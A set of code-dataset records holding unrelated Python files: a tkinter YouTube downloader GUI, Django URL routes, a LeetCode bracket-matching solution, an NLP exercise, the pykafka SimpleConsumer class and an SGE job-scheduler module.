'\n                                '[y/n]' % (filepath)).strip().lower()\n    while overwrite not in ('y', 'n'):\n        overwrite = six.moves.input('Enter \"y\" (overwrite) or \"n\" '\n                                    '(cancel).').strip().lower()\n    if overwrite == 'n':\n        return False\n    print('[TIP] Next time specify overwrite=True!')\n    return True\n","sub_path":"graphgallery/utils/misc.py","file_name":"misc.py","file_ext":"py","file_size_in_byte":983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"307154448","text":"import tkinter as tk\r\nfrom tkinter import ttk\r\n\r\n# open_location and download_video are assumed to be provided elsewhere in this project\r\n\r\ndef main():\r\n    root=tk.Tk()\r\n    root.title(\"Youtube Downloader\")\r\n    root.geometry(\"800x400\")\r\n    root.columnconfigure(0,weight=1)\r\n\r\n    #ytdLabel\r\n    ytdLabel=tk.Label(root,text=\"Enter your URL\")\r\n    ytdLabel.grid()\r\n\r\n    #Entry box\r\n    ytdEntryVar=tk.StringVar()\r\n    ytdEntry=tk.Entry(root,width=50,textvariable=ytdEntryVar)\r\n    ytdEntry.grid()\r\n\r\n    #Url error msg\r\n    ytdError=tk.Label(root,text=\"\",fg=\"red\")\r\n    ytdError.grid()\r\n\r\n    #save file\r\n    saveLabel=tk.Label(root,text=\"Save the file\")\r\n    saveLabel.grid()\r\n\r\n    # Location error msg\r\n    locationError=tk.Label(root,text=\"\",fg=\"red\")\r\n    locationError.grid()\r\n\r\n    # button save file; wrap the handler in a lambda so it runs on click, not at startup\r\n    saveEntry = tk.Button(root,bg=\"red\",text=\"Choose Path\", command=lambda: open_location(locationError))\r\n    saveEntry.grid()\r\n\r\n    #type video or audio\r\n    ytdQuality= tk.Label(root,text=\"Select type\")\r\n    ytdQuality.grid()\r\n\r\n    #Combobox\r\n    choices=[\"720p\",\"144p\",\"Only Audio\"]\r\n    ydtChoices=ttk.Combobox(root,values=choices)\r\n    ydtChoices.grid()\r\n\r\n    #download button; also deferred with a lambda\r\n    downloadbtn=tk.Button(root,text=\"Download\",command=lambda: download_video(ydtChoices,ytdEntry,ytdError,choices))\r\n    downloadbtn.grid()\r\n\r\n    # pycoders\r\n    pycodersTeam = tk.Label(root, text=\"pycoders\")\r\n    pycodersTeam.grid()\r\n\r\n    root.mainloop()\r\n\r\n\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"108840138","text":"from django.conf.urls import patterns, include, url\nfrom django.conf.urls.static import static\nfrom django.contrib.staticfiles.urls import staticfiles_urlpatterns\nfrom django.contrib import admin\n\nimport settings\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n    # Examples:\n    #url(r'^$', 'store.views.index', name='index'),\n\n    url(r'^admin/', include(admin.site.urls)),\n\n\t# ex: /about/\n\turl(r'^about/$', 'store.views.about', name='about'),\n\t# ex: /store/2/\n\turl(r'^store/(?P<product_id>[0-9]+)/$', 'store.views.detail', name='detail'),\n\t# ex: /menu\n\turl(r'^menu/', 'store.views.menu', name='menu'),\n\t# ex: /search/pelmeni\n\turl(r'^search/$', 'store.views.search', name='search'),\n\n    #url(r'^about/', include(\"store.urls\")),\n    url(r'^$', include(\"store.urls\")),\n)# + static(settings.STATIC_URL, document_root=settings.STATIC_URL)\n\n#urlpatterns += staticfiles_urlpatterns()\n\n\nif settings.DEBUG:\n    urlpatterns += patterns(\n        'django.views.static',\n        (r'^media/(?P<path>.*)',\n        'serve',\n        {'document_root': settings.MEDIA_ROOT}), )","sub_path":"shop/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1064,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"160616950","text":"#https://leetcode.com/problems/valid-parentheses/description/\r\nclass Solution:\r\n    def isValid(self, s):\r\n        \"\"\"\r\n        :type s: str\r\n        :rtype: bool\r\n        \"\"\"\r\n        track_dict = {\"[]\":0, \"{}\":0, \"()\":0}\r\n        one = 
list(\"[]\")\r\n two = list(\"{}\")\r\n three = list(\"()\")\r\n right = list(\")]}\")\r\n left = list(\"({[\")\r\n prev = \"\"\r\n bool_set = False\r\n opened_list = []\r\n \r\n for char in list(s):\r\n output, track_dict = self.checkBracket(char, track_dict, one, two, three)\r\n \r\n if bool_set:\r\n if char == output[1] and prev not in right and prev != output[0]:\r\n return False\r\n if char in left:\r\n opened_list.append(char)\r\n elif char in right:\r\n try:\r\n if opened_list.pop() not in output:\r\n return False\r\n except:\r\n continue\r\n \r\n bool_set = True\r\n prev = char\r\n \r\n for total in track_dict.values():\r\n if total != 0:\r\n return False\r\n return True\r\n \r\n def checkBracket(self, char, track_dict, one, two, three):\r\n \"\"\"\r\n :type char: str, track_dict: dict, one: list, two:list, three:list\r\n :rtype: list, dict \r\n \"\"\"\r\n if char in one:\r\n if char == one[0]:\r\n track_dict[\"[]\"] -= 1\r\n else:\r\n track_dict[\"[]\"] += 1\r\n return one, track_dict\r\n elif char in two:\r\n if char == two[0]:\r\n track_dict[\"{}\"] -= 1\r\n else:\r\n track_dict[\"{}\"] += 1\r\n return two, track_dict\r\n elif char in three:\r\n if char == three[0]:\r\n track_dict[\"()\"] -= 1\r\n else:\r\n track_dict[\"()\"] += 1\r\n return three, track_dict\r\n","sub_path":"LeetCode/Valid Parentheses.py","file_name":"Valid Parentheses.py","file_ext":"py","file_size_in_byte":1998,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"113487910","text":"from knock41 import sentences\n\n\nfor sentence in sentences:\n verb = ''; v_srcs = []\n particles = []\n arguments = []\n for chunk in sentence:\n\n #動詞決定\n for morph in chunk.morphs:\n if morph.pos == '動詞':\n verb = morph.base\n v_srcs += chunk.srcs\n \n if verb == '':\n continue\n \n #格パターン、項の抽出\n for src in v_srcs:\n particle = []\n argument = set()\n for morph in sentence[src].morphs:\n if morph.pos == '助詞':\n particle.append(morph.surface)\n argument.add(sentence[src].phrase)\n particles.extend(particle)\n arguments.extend(list(argument))\n\n particles = '\\t'.join(particles)\n arguments = '\\t'.join(arguments)\n if not particles == []:\n print(f'{verb}\\t{particles}\\t{arguments}')\n\n verb = ''; v_srcs = []\n particles = []\n arguments = []","sub_path":"masamune/chapter05/knock46.py","file_name":"knock46.py","file_ext":"py","file_size_in_byte":1120,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"495134485","text":"from __future__ import division\n\"\"\"\nAuthor: Emmett Butler\n\"\"\"\n__license__ = \"\"\"\nCopyright 2015 Parse.ly, Inc.\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\"\"\"\n__all__ = [\"SimpleConsumer\"]\nimport itertools\nimport logging\nimport time\nimport threading\nfrom collections import defaultdict\nfrom Queue import Queue, Empty\n\nimport base\nfrom .common import OffsetType\nfrom .utils.compat import Semaphore\nfrom .exceptions import (OffsetOutOfRangeError, UnknownTopicOrPartition,\n OffsetMetadataTooLarge, 
OffsetsLoadInProgress,\n NotCoordinatorForConsumer, SocketDisconnectedError,\n ConsumerStoppedException, ERROR_CODES)\nfrom .protocol import (PartitionFetchRequest, PartitionOffsetCommitRequest,\n PartitionOffsetFetchRequest, PartitionOffsetRequest)\nfrom .utils.error_handlers import handle_partition_responses, raise_error\n\n\nlog = logging.getLogger(__name__)\n\n\nclass SimpleConsumer(base.BaseSimpleConsumer):\n \"\"\"\n A non-balancing consumer for Kafka\n \"\"\"\n def __init__(self,\n topic,\n cluster,\n consumer_group=None,\n partitions=None,\n fetch_message_max_bytes=1024 * 1024,\n num_consumer_fetchers=1,\n auto_commit_enable=False,\n auto_commit_interval_ms=60 * 1000,\n queued_max_messages=2000,\n fetch_min_bytes=1,\n fetch_wait_max_ms=100,\n refresh_leader_backoff_ms=200,\n offsets_channel_backoff_ms=1000,\n offsets_commit_max_retries=5,\n auto_offset_reset=OffsetType.LATEST,\n consumer_timeout_ms=-1,\n auto_start=True,\n reset_offset_on_start=False):\n \"\"\"Create a SimpleConsumer.\n\n Settings and default values are taken from the Scala\n consumer implementation. Consumer group is included\n because it's necessary for offset management, but doesn't imply\n that this is a balancing consumer. Use a BalancedConsumer for\n that.\n\n :param topic: The topic this consumer should consume\n :type topic: :class:`pykafka.topic.Topic`\n :param cluster: The cluster to which this consumer should connect\n :type cluster: :class:`pykafka.cluster.Cluster`\n :param consumer_group: The name of the consumer group this consumer\n should use for offset committing and fetching.\n :type consumer_group: str\n :param partitions: Existing partitions to which to connect\n :type partitions: Iterable of :class:`pykafka.partition.Partition`\n :param fetch_message_max_bytes: The number of bytes of messages to\n attempt to fetch\n :type fetch_message_max_bytes: int\n :param num_consumer_fetchers: The number of workers used to make\n FetchRequests\n :type num_consumer_fetchers: int\n :param auto_commit_enable: If true, periodically commit to kafka the\n offset of messages already fetched by this consumer. This also\n requires that `consumer_group` is not `None`.\n :type auto_commit_enable: bool\n :param auto_commit_interval_ms: The frequency (in milliseconds) at which the\n consumer offsets are committed to kafka. This setting is ignored if\n `auto_commit_enable` is `False`.\n :type auto_commit_interval_ms: int\n :param queued_max_messages: Maximum number of messages buffered for\n consumption\n :type queued_max_messages: int\n :param fetch_min_bytes: The minimum amount of data (in bytes) the server\n should return for a fetch request. 
If insufficient data is available\n the request will block until sufficient data is available.\n :type fetch_min_bytes: int\n :param fetch_wait_max_ms: The maximum amount of time (in milliseconds)\n the server will block before answering the fetch request if there\n isn't sufficient data to immediately satisfy `fetch_min_bytes`.\n :type fetch_wait_max_ms: int\n :param refresh_leader_backoff_ms: Backoff time (in milliseconds) to\n refresh the leader of a partition after the consumer loses the\n current leader.\n :type refresh_leader_backoff_ms: int\n :param offsets_channel_backoff_ms: Backoff time (in milliseconds) to\n retry offset commits/fetches\n :type offsets_channel_backoff_ms: int\n :param offsets_commit_max_retries: Retry the offset commit up to this\n many times on failure.\n :type offsets_commit_max_retries: int\n :param auto_offset_reset: What to do if an offset is out of range. This\n setting indicates how to reset the consumer's internal offset\n counter when an `OffsetOutOfRangeError` is encountered.\n :type auto_offset_reset: :class:`pykafka.common.OffsetType`\n :param consumer_timeout_ms: Amount of time (in milliseconds) the\n consumer may spend without messages available for consumption\n before raising an error.\n :type consumer_timeout_ms: int\n :param auto_start: Whether the consumer should begin communicating\n with kafka after __init__ is complete. If false, communication\n can be started with `start()`.\n :type auto_start: bool\n :param reset_offset_on_start: Whether the consumer should reset its\n internal offset counter to `self._auto_offset_reset` and commit that\n offset immediately upon starting up\n :type reset_offset_on_start: bool\n \"\"\"\n self._cluster = cluster\n self._consumer_group = consumer_group\n self._topic = topic\n self._fetch_message_max_bytes = fetch_message_max_bytes\n self._fetch_min_bytes = fetch_min_bytes\n self._queued_max_messages = queued_max_messages\n self._num_consumer_fetchers = num_consumer_fetchers\n self._fetch_wait_max_ms = fetch_wait_max_ms\n self._consumer_timeout_ms = consumer_timeout_ms\n self._offsets_channel_backoff_ms = offsets_channel_backoff_ms\n self._auto_offset_reset = auto_offset_reset\n self._offsets_commit_max_retries = offsets_commit_max_retries\n # not directly configurable\n self._offsets_fetch_max_retries = offsets_commit_max_retries\n self._offsets_reset_max_retries = offsets_commit_max_retries\n self._auto_start = auto_start\n self._reset_offset_on_start = reset_offset_on_start\n\n # incremented for any message arrival from any partition\n # the initial value is 0 (no messages waiting)\n self._messages_arrived = Semaphore(value=0)\n\n self._auto_commit_enable = auto_commit_enable\n self._auto_commit_interval_ms = auto_commit_interval_ms\n self._last_auto_commit = time.time()\n\n self._discover_offset_manager()\n\n if partitions:\n self._partitions = dict((OwnedPartition(p, self._messages_arrived), p)\n for p in partitions)\n else:\n self._partitions = dict((OwnedPartition(p, self._messages_arrived),\n topic.partitions[k])\n for k, p in topic.partitions.iteritems())\n self._partitions_by_id = dict((p.partition.id, p)\n for p in self._partitions.iterkeys())\n # Organize partitions by leader for efficient queries\n self._partitions_by_leader = defaultdict(list)\n for p in self._partitions.iterkeys():\n self._partitions_by_leader[p.partition.leader].append(p)\n self.partition_cycle = itertools.cycle(self._partitions.keys())\n\n self._default_error_handlers = self._build_default_error_handlers()\n\n self._running = 
False\n        if self._auto_start:\n            self.start()\n\n    def __repr__(self):\n        return \"<{module}.{name} at {id_} (consumer_group={group})>\".format(\n            module=self.__class__.__module__,\n            name=self.__class__.__name__,\n            id_=hex(id(self)),\n            group=self._consumer_group\n        )\n\n    def start(self):\n        \"\"\"Begin communicating with Kafka, including setting up worker threads\n\n        Fetches offsets, starts an offset autocommitter worker pool, and\n        starts a message fetcher worker pool.\n        \"\"\"\n        self._running = True\n\n        # Figure out which offset we're starting on\n        if self._reset_offset_on_start:\n            self._reset_offsets()\n            # make sure the reset is saved in kafka before it can rebalance\n            self.commit_offsets()\n        elif self._consumer_group is not None:\n            self.fetch_offsets()\n\n        self._fetch_workers = self._setup_fetch_workers()\n\n        if self._auto_commit_enable:\n            self._autocommit_worker_thread = self._setup_autocommit_worker()\n\n    def _build_default_error_handlers(self):\n        \"\"\"Set up the error handlers to use for partition errors.\"\"\"\n        def _handle_OffsetOutOfRangeError(parts):\n            self._reset_offsets([owned_partition\n                                 for owned_partition, pres in parts])\n\n        def _handle_NotCoordinatorForConsumer(parts):\n            self._discover_offset_manager()\n\n        return {\n            UnknownTopicOrPartition.ERROR_CODE: lambda p: raise_error(UnknownTopicOrPartition),\n            OffsetOutOfRangeError.ERROR_CODE: _handle_OffsetOutOfRangeError,\n            OffsetMetadataTooLarge.ERROR_CODE: lambda p: raise_error(OffsetMetadataTooLarge),\n            NotCoordinatorForConsumer.ERROR_CODE: _handle_NotCoordinatorForConsumer\n        }\n\n    def _discover_offset_manager(self):\n        \"\"\"Set the offset manager for this consumer.\n\n        If a consumer group is not supplied to __init__, this method does nothing\n        \"\"\"\n        if self._consumer_group is not None:\n            self._offset_manager = self._cluster.get_offset_manager(self._consumer_group)\n\n    @property\n    def topic(self):\n        \"\"\"The topic this consumer consumes\"\"\"\n        return self._topic\n\n    @property\n    def partitions(self):\n        \"\"\"A list of the partitions that this consumer consumes\"\"\"\n        return self._partitions\n\n    def __del__(self):\n        \"\"\"Stop consumption and workers when object is deleted\"\"\"\n        self.stop()\n\n    def stop(self):\n        \"\"\"Flag all running workers for deletion.\"\"\"\n        self._running = False\n\n    def _setup_autocommit_worker(self):\n        \"\"\"Start the autocommitter thread\"\"\"\n        def autocommitter():\n            while True:\n                if not self._running:\n                    break\n                if self._auto_commit_enable:\n                    self._auto_commit()\n                time.sleep(self._auto_commit_interval_ms / 1000)\n            log.debug(\"Autocommitter thread exiting\")\n        log.debug(\"Starting autocommitter thread\")\n        return self._cluster.handler.spawn(autocommitter)\n\n    def _setup_fetch_workers(self):\n        \"\"\"Start the fetcher threads\"\"\"\n        def fetcher():\n            while True:\n                if not self._running:\n                    break\n                self.fetch()\n                time.sleep(.0001)\n            log.debug(\"Fetcher thread exiting\")\n        log.info(\"Starting %s fetcher threads\", self._num_consumer_fetchers)\n        return [self._cluster.handler.spawn(fetcher)\n                for i in xrange(self._num_consumer_fetchers)]\n\n    def __iter__(self):\n        \"\"\"Yield an infinite stream of messages until the consumer times out\"\"\"\n        while True:\n            message = self.consume(block=True)\n            if not message:\n                raise StopIteration\n            yield message\n\n    def consume(self, block=True):\n        \"\"\"Get one message from the consumer.\n\n        :param block: Whether to block while waiting for a message\n        :type block: bool\n        \"\"\"\n        timeout = None\n        if block:\n            if self._consumer_timeout_ms > 0:\n                timeout = 
float(self._consumer_timeout_ms) / 1000\n else:\n timeout = 1.0\n\n while True:\n if self._messages_arrived.acquire(blocking=block, timeout=timeout):\n # by passing through this semaphore, we know that at\n # least one message is waiting in some queue.\n message = None\n while not message:\n owned_partition = self.partition_cycle.next()\n message = owned_partition.consume()\n return message\n else:\n if not self._running:\n raise ConsumerStoppedException()\n elif not block or self._consumer_timeout_ms > 0:\n return None\n\n def _auto_commit(self):\n \"\"\"Commit offsets only if it's time to do so\"\"\"\n if not self._auto_commit_enable or self._auto_commit_interval_ms == 0:\n return\n\n if (time.time() - self._last_auto_commit) * 1000.0 >= self._auto_commit_interval_ms:\n log.info(\"Autocommitting consumer offset for consumer group %s and topic %s\",\n self._consumer_group, self._topic.name)\n self.commit_offsets()\n self._last_auto_commit = time.time()\n\n def commit_offsets(self):\n \"\"\"Commit offsets for this consumer's partitions\n\n Uses the offset commit/fetch API\n \"\"\"\n if not self._consumer_group:\n raise Exception(\"consumer group must be specified to commit offsets\")\n\n reqs = [p.build_offset_commit_request() for p in self._partitions.keys()]\n log.debug(\"Committing offsets for %d partitions to broker id %s\", len(reqs),\n self._offset_manager.id)\n for i in xrange(self._offsets_commit_max_retries):\n if i > 0:\n log.debug(\"Retrying\")\n time.sleep(i * (self._offsets_channel_backoff_ms / 1000))\n\n response = self._offset_manager.commit_consumer_group_offsets(\n self._consumer_group, 1, 'pykafka', reqs)\n parts_by_error = handle_partition_responses(\n response,\n self._default_error_handlers,\n partitions_by_id=self._partitions_by_id)\n if len(parts_by_error) == 1 and 0 in parts_by_error:\n break\n log.error(\"Error committing offsets for topic %s (errors: %s)\",\n self._topic.name,\n dict((ERROR_CODES[err], [op.partition.id for op, _ in parts])\n for err, parts in parts_by_error.iteritems()))\n\n # retry only the partitions that errored\n if 0 in parts_by_error:\n parts_by_error.pop(0)\n errored_partitions = [op for code, err_group in parts_by_error.iteritems()\n for op, res in err_group]\n reqs = [p.build_offset_commit_request() for p in errored_partitions]\n\n def fetch_offsets(self):\n \"\"\"Fetch offsets for this consumer's topic\n\n Uses the offset commit/fetch API\n\n :return: List of (id, :class:`pykafka.protocol.OffsetFetchPartitionResponse`)\n tuples\n \"\"\"\n if not self._consumer_group:\n raise Exception(\"consumer group must be specified to fetch offsets\")\n\n def _handle_success(parts):\n for owned_partition, pres in parts:\n log.debug(\"Set offset for partition %s to %s\",\n owned_partition.partition.id,\n pres.offset)\n owned_partition.set_offset(pres.offset)\n\n reqs = [p.build_offset_fetch_request() for p in self._partitions.keys()]\n success_responses = []\n\n log.debug(\"Fetching offsets for %d partitions from broker id %s\", len(reqs),\n self._offset_manager.id)\n\n for i in xrange(self._offsets_fetch_max_retries):\n if i > 0:\n log.debug(\"Retrying offset fetch\")\n\n res = self._offset_manager.fetch_consumer_group_offsets(self._consumer_group, reqs)\n parts_by_error = handle_partition_responses(\n res,\n self._default_error_handlers,\n success_handler=_handle_success,\n partitions_by_id=self._partitions_by_id)\n\n success_responses.extend([(op.partition.id, r)\n for op, r in parts_by_error.get(0, [])])\n if len(parts_by_error) == 1 and 0 in 
parts_by_error:\n return success_responses\n log.error(\"Error fetching offsets for topic %s (errors: %s)\",\n self._topic.name,\n dict((ERROR_CODES[err], [op.partition.id for op, _ in parts])\n for err, parts in parts_by_error.iteritems()))\n\n time.sleep(i * (self._offsets_channel_backoff_ms / 1000))\n\n # retry only specific error responses\n to_retry = []\n to_retry.extend(parts_by_error.get(OffsetsLoadInProgress.ERROR_CODE, []))\n to_retry.extend(parts_by_error.get(NotCoordinatorForConsumer.ERROR_CODE, []))\n reqs = [p.build_offset_fetch_request() for p, _ in to_retry]\n\n def _reset_offsets(self, partitions=None):\n \"\"\"Reset offsets after an error\n\n Issue an OffsetRequest for each partition and set the appropriate\n returned offset in the OwnedPartition per self._auto_offset_reset\n\n :param partitions: the partitions for which to reset offsets\n :type partitions: Iterable of\n :class:`pykafka.simpleconsumer.OwnedPartition`\n \"\"\"\n def _handle_success(parts):\n for owned_partition, pres in parts:\n # offset_latest requests return the next offset to consume,\n # so account for this here by passing offset - 1\n owned_partition.set_offset(pres.offset[0] - 1)\n\n if partitions is None:\n partitions = self._partitions.keys()\n\n log.info(\"Resetting offsets for %s partitions\", len(list(partitions)))\n\n for i in xrange(self._offsets_reset_max_retries):\n # group partitions by leader\n by_leader = defaultdict(list)\n for p in partitions:\n by_leader[p.partition.leader].append(p)\n\n # get valid offset ranges for each partition\n for broker, owned_partitions in by_leader.iteritems():\n reqs = [owned_partition.build_offset_request(self._auto_offset_reset)\n for owned_partition in owned_partitions]\n response = broker.request_offset_limits(reqs)\n parts_by_error = handle_partition_responses(\n response,\n self._default_error_handlers,\n success_handler=_handle_success,\n partitions_by_id=self._partitions_by_id)\n\n if len(parts_by_error) == 1 and 0 in parts_by_error:\n break\n log.error(\"Error resetting offsets for topic %s (errors: %s)\",\n self._topic.name,\n dict((ERROR_CODES[err], [op.partition.id for op, _ in parts])\n for err, parts in parts_by_error.iteritems()))\n\n time.sleep(i * (self._offsets_channel_backoff_ms / 1000))\n\n if 0 in parts_by_error:\n parts_by_error.pop(0)\n partitions = []\n partitions.extend(\n [part for errcode, parts in parts_by_error.iteritems()\n for part in parts])\n\n def fetch(self):\n \"\"\"Fetch new messages for all partitions\n\n Create a FetchRequest for each broker and send it. 
Enqueue each of the\n        returned messages in the appropriate OwnedPartition.\n        \"\"\"\n        def _handle_success(parts):\n            for owned_partition, pres in parts:\n                if len(pres.messages) > 0:\n                    log.debug(\"Fetched %s messages for partition %s\",\n                              len(pres.messages), owned_partition.partition.id)\n                    owned_partition.enqueue_messages(pres.messages)\n                    log.debug(\"Partition %s queue holds %s messages\",\n                              owned_partition.partition.id,\n                              owned_partition.message_count)\n\n        for broker, owned_partitions in self._partitions_by_leader.iteritems():\n            partition_reqs = {}\n            for owned_partition in owned_partitions:\n                # attempt to acquire lock, just pass if we can't\n                if owned_partition.lock.acquire(False):\n                    partition_reqs[owned_partition] = None\n                    if owned_partition.message_count < self._queued_max_messages:\n                        fetch_req = owned_partition.build_fetch_request(\n                            self._fetch_message_max_bytes)\n                        partition_reqs[owned_partition] = fetch_req\n                    else:\n                        log.debug(\"Partition %s above max queued count (queue has %d)\",\n                                  owned_partition.partition.id,\n                                  owned_partition.message_count)\n            if partition_reqs:\n                try:\n                    response = broker.fetch_messages(\n                        [a for a in partition_reqs.itervalues() if a],\n                        timeout=self._fetch_wait_max_ms,\n                        min_bytes=self._fetch_min_bytes\n                    )\n                except SocketDisconnectedError:\n                    # If the broker dies while we're supposed to stop,\n                    # it's fine, and probably an integration test.\n                    if not self._running:\n                        return\n                    else:\n                        raise\n                handle_partition_responses(\n                    response,\n                    self._default_error_handlers,\n                    success_handler=_handle_success,\n                    partitions_by_id=self._partitions_by_id)\n                for owned_partition in partition_reqs.iterkeys():\n                    owned_partition.lock.release()\n\n\nclass OwnedPartition(object):\n    \"\"\"A partition that is owned by a SimpleConsumer.\n\n    Used to keep track of offsets and the internal message queue.\n    \"\"\"\n\n    def __init__(self,\n                 partition,\n                 semaphore=None):\n        \"\"\"\n        :param partition: The partition to hold\n        :type partition: :class:`pykafka.partition.Partition`\n        :param semaphore: A Semaphore that counts available messages and\n            facilitates non-busy blocking\n        :type semaphore: :class:`pykafka.utils.compat.Semaphore`\n        \"\"\"\n        self.partition = partition\n        self._messages = Queue()\n        self._messages_arrived = semaphore\n        self.last_offset_consumed = 0\n        self.next_offset = 0\n        self.lock = threading.Lock()\n\n    @property\n    def message_count(self):\n        \"\"\"Count of messages currently in this partition's internal queue\"\"\"\n        return self._messages.qsize()\n\n    def set_offset(self, last_offset_consumed):\n        \"\"\"Set the internal offset counters\n\n        :param last_offset_consumed: The last committed offset for this\n            partition\n        :type last_offset_consumed: int\n        \"\"\"\n        self.last_offset_consumed = last_offset_consumed\n        self.next_offset = last_offset_consumed + 1\n\n    def build_offset_request(self, auto_offset_reset):\n        \"\"\"Create a :class:`pykafka.protocol.PartitionOffsetRequest` for this\n        partition\n\n        :param auto_offset_reset: What to do if an offset is out of range. 
This\n setting indicates how to reset the consumer's internal offset\n counter when an OffsetOutOfRangeError is encountered.\n :type auto_offset_reset: :class:`pykafka.common.OffsetType`\n \"\"\"\n return PartitionOffsetRequest(\n self.partition.topic.name, self.partition.id,\n auto_offset_reset, 1)\n\n def build_fetch_request(self, max_bytes):\n \"\"\"Create a :class:`pykafka.protocol.FetchPartitionRequest` for this\n partition.\n\n :param max_bytes: The number of bytes of messages to\n attempt to fetch\n :type max_bytes: int\n \"\"\"\n return PartitionFetchRequest(\n self.partition.topic.name, self.partition.id,\n self.next_offset, max_bytes)\n\n def build_offset_commit_request(self):\n \"\"\"Create a :class:`pykafka.protocol.PartitionOffsetCommitRequest`\n for this partition\n \"\"\"\n return PartitionOffsetCommitRequest(\n self.partition.topic.name,\n self.partition.id,\n self.last_offset_consumed,\n int(time.time() * 1000),\n 'pykafka'\n )\n\n def build_offset_fetch_request(self):\n \"\"\"Create a PartitionOffsetFetchRequest for this partition\n \"\"\"\n return PartitionOffsetFetchRequest(\n self.partition.topic.name,\n self.partition.id\n )\n\n def consume(self):\n \"\"\"Get a single message from this partition\"\"\"\n try:\n message = self._messages.get_nowait()\n self.last_offset_consumed = message.offset\n return message\n except Empty:\n return None\n\n def enqueue_messages(self, messages):\n \"\"\"Put a set of messages into the internal message queue\n\n :param messages: The messages to enqueue\n :type messages: Iterable of :class:`pykafka.common.Message`\n \"\"\"\n for message in messages:\n if message.offset < self.last_offset_consumed:\n log.debug(\"Skipping enqueue for offset (%s) \"\n \"less than last_offset_consumed (%s)\",\n message.offset, self.last_offset_consumed)\n continue\n self._messages.put(message)\n self.next_offset = message.offset + 1\n\n if self._messages_arrived is not None:\n self._messages_arrived.release()\n","sub_path":"pykafka/simpleconsumer.py","file_name":"simpleconsumer.py","file_ext":"py","file_size_in_byte":26778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"418683368","text":"\"\"\"Implementation of the scheduling system for SGE scheduler at UND.\n\nThis module implements the Scheduler and ClusterJob classes.\n\"\"\"\nimport errno\nimport getpass\nimport logging\nimport subprocess\nimport tempfile\nimport xml.etree.ElementTree as ET\n\nfrom flow.errors import SubmitError\nfrom flow.scheduling.base import ClusterJob, JobStatus, Scheduler\n\nlogger = logging.getLogger(__name__)\n\n\ndef _fetch(user=None):\n \"\"\"Fetch the cluster job status information from the SGE scheduler.\"\"\"\n\n def parse_status(s):\n s = s.strip()\n if s == \"qw\":\n return JobStatus.queued\n elif s == \"r\":\n return JobStatus.active\n elif s in [\"Eqw\"]:\n return JobStatus.error\n return JobStatus.registered\n\n if user is None:\n user = getpass.getuser()\n\n cmd = [\"qstat\", \"-u\", user, \"-xml\"]\n try:\n result = subprocess.check_output(cmd).decode(\n \"utf-8\", errors=\"backslashreplace\"\n )\n except subprocess.CalledProcessError:\n raise\n except IOError as error:\n if error.errno != errno.ENOENT:\n raise\n else:\n raise RuntimeError(\"SGE not available.\")\n root = ET.fromstring(result)\n jobs = root.find(\"queue_info\")\n for job in jobs:\n status = job.find(\"state\").text\n name = job.find(\"JB_name\").text\n yield SGEJob(name, parse_status(status))\n jobs = root.find(\"job_info\")\n for job in 
jobs:\n        status = job.find(\"state\").text\n        name = job.find(\"JB_name\").text\n        yield SGEJob(name, parse_status(status))\n\n\nclass SGEJob(ClusterJob):\n    \"\"\"A SGEJob is a ClusterJob managed by a SGE scheduler.\"\"\"\n\n    pass\n\n\nclass SGEScheduler(Scheduler):\n    \"\"\"Implementation of the abstract Scheduler class for SGE schedulers.\n\n    This class allows us to submit cluster jobs to a SGE scheduler and query\n    their current status.\n\n    :param user:\n        Limit the status information to cluster jobs submitted by user.\n    :type user:\n        str\n    \"\"\"\n\n    # The standard command used to submit jobs to the SGE scheduler.\n    submit_cmd = [\"qsub\"]\n\n    def __init__(self, user=None, **kwargs):\n        super(SGEScheduler, self).__init__(**kwargs)\n        self.user = user\n\n    def jobs(self):\n        \"\"\"Yield cluster jobs by querying the scheduler.\"\"\"\n        self._prevent_dos()\n        for job in _fetch(user=self.user):\n            yield job\n\n    def submit(\n        self,\n        script,\n        after=None,\n        hold=False,\n        pretend=False,\n        flags=None,\n        **kwargs\n    ):\n        \"\"\"Submit a job script for execution to the scheduler.\n\n        :param script:\n            The job script submitted for execution.\n        :type script:\n            str\n        :param after:\n            Execute the submitted script after a job with this id has completed.\n        :type after:\n            str\n        :param pretend:\n            If True, do not actually submit the script, but only simulate the submission.\n            Can be used to test whether the submission would be successful.\n            Please note: A successful \"pretend\" submission is not guaranteed to succeed.\n        :type pretend:\n            bool\n        :param flags:\n            Additional arguments to pass through to the scheduler submission command.\n        :type flags:\n            list\n        :returns:\n            Returns True if the cluster job was successfully submitted, otherwise None.\n        \"\"\"\n        if flags is None:\n            flags = []\n        elif isinstance(flags, str):\n            flags = flags.split()\n\n        submit_cmd = self.submit_cmd + flags\n\n        if after is not None:\n            submit_cmd.extend([\"-hold_jid\", \"{}\".format(after.split(\".\")[0])])\n\n        if pretend:\n            print(\"# Submit command: {}\".format(\" \".join(submit_cmd)))\n            print(script)\n            print()\n        else:\n            with tempfile.NamedTemporaryFile() as tmp_submit_script:\n                tmp_submit_script.write(str(script).encode(\"utf-8\"))\n                tmp_submit_script.flush()\n                try:\n                    subprocess.check_output(\n                        submit_cmd + [tmp_submit_script.name],\n                        universal_newlines=True,\n                    )\n                except subprocess.CalledProcessError as e:\n                    raise SubmitError(\"SGE error: {}\".format(e.output))\n\n        return True\n\n    @classmethod\n    def is_present(cls):\n        \"\"\"Return True if it appears that a SGE scheduler is available within the environment.\"\"\"\n        try:\n            subprocess.check_output(\n                [\"sge_qmaster\", \"-help\"], stderr=subprocess.STDOUT\n            )\n        except (IOError, OSError):\n            return False\n        else:\n            return 